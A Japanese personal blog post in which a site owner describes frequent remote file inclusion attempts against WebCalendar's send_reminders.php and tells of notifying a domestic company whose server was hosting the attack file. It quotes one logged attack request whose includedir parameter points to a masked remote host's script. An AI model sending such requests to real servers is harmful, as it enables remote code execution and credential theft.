メニュー 蕭寥亭 検索

開店休業の記

「リモートファイルインクルード脆弱性を利用した攻撃」らしい

 このところ順調に来客数が増えてうれしいのですが、それに歩調をあわせるように不審アクセスも増えています。ここんとこ、もう毎日です。つーか数時間おきというくらい来てます。やれやれ。

 前にも書きましたが、典型的なのはこんな感じでアクセスしてきます↓。

GET //tools/send_reminders.php?noSet=0&includedir=http://xxx.xxx.xxx/errors.txt? HTTP/1.1

 このリクエストにある "/tools/send_reminders.php" ってファイルはどうやら webcalendar という PHP 用アプリで使われているもので、ここから上の例では "http://xxx.xxx.xxx/errors.txt"( "xxx.xxx.xxx" の部分は実在のアドレスでした)というファイルを読み込ませることによって任意のコマンドを実行することができるようになるらしいです。リンク先には詳細なレポートがあります。上の例の "http://xxx.xxx.xxx/errors.txt" というファイルの中身を見てみたのですが、そこにはどうやらサーバ名、使用OS、ID、パスワード等をブラウザに表示させようという PHP スクリプトが書いてありました。製作者の名称なのか、"UNITED ALBANIANS aka ALBOSS PARADISE" という文字を表示させるようにもなっていました。

 ウチには "send_reminders.php" 他攻撃対象にされるようなファイルはほとんど置いていないので、攻撃は空振りに終わっているのですが、ちょっと気になるのは時々ウチのサイト特有のファイル名(多分)を指定して攻撃をかけてくることがあること。ちなみにそのファイルで表示されるページというのは "Morfeus Fucking Scanner" について書いたトコなんですよね・・・。このタイプの攻撃と "Morfeus" なんたらは関係あるということか? んで書いたことで攻撃者の目の敵にされたとか? あらら。でも、そのページにこの種の攻撃かけても効果ないんだけど。それにウチ、そもそも webcalendar は使っていないし。なんだかなぁ・・・。

 も一つ。この攻撃に使われるファイル(上の例での "http://xxx.xxx.xxx/errors.txt" )は何種類もあり、また置かれているサーバーも世界各地に散っています(商用サイトのサーバー非常に多し・多分、この攻撃によって侵入されて踏み台になってしまっていると思われます)。最近、ウチサイトのへの攻撃に使われたものの中には jp ドメインのもあったりして・・・、頭痛い・・・。「海外なら放っておくしか手がないけど、日本国内じゃあなぁ・・・」としばらく悩んだ末、そのアドレスの会社(名は秘しますがそのサーバーのサイトで一般向け商品販売をしていました)に電話で連絡しました。「突然『お宅のサーバー、不正侵入されてますよ』なんて通知したら、かえってこっちが疑われるかも」と内心ビクビクしていたのですが、電話に出られた方は丁寧に対応してくださいました。でも、連絡後にもまたそこのサーバーに置かれたファイルを使った不審アクセスがあったんだよね・・・。やっぱり信用されてなかったか。それとも、わたしの説明のしかたが悪かったのか・・・。こういう時ってどうすりゃいいんでしょうか?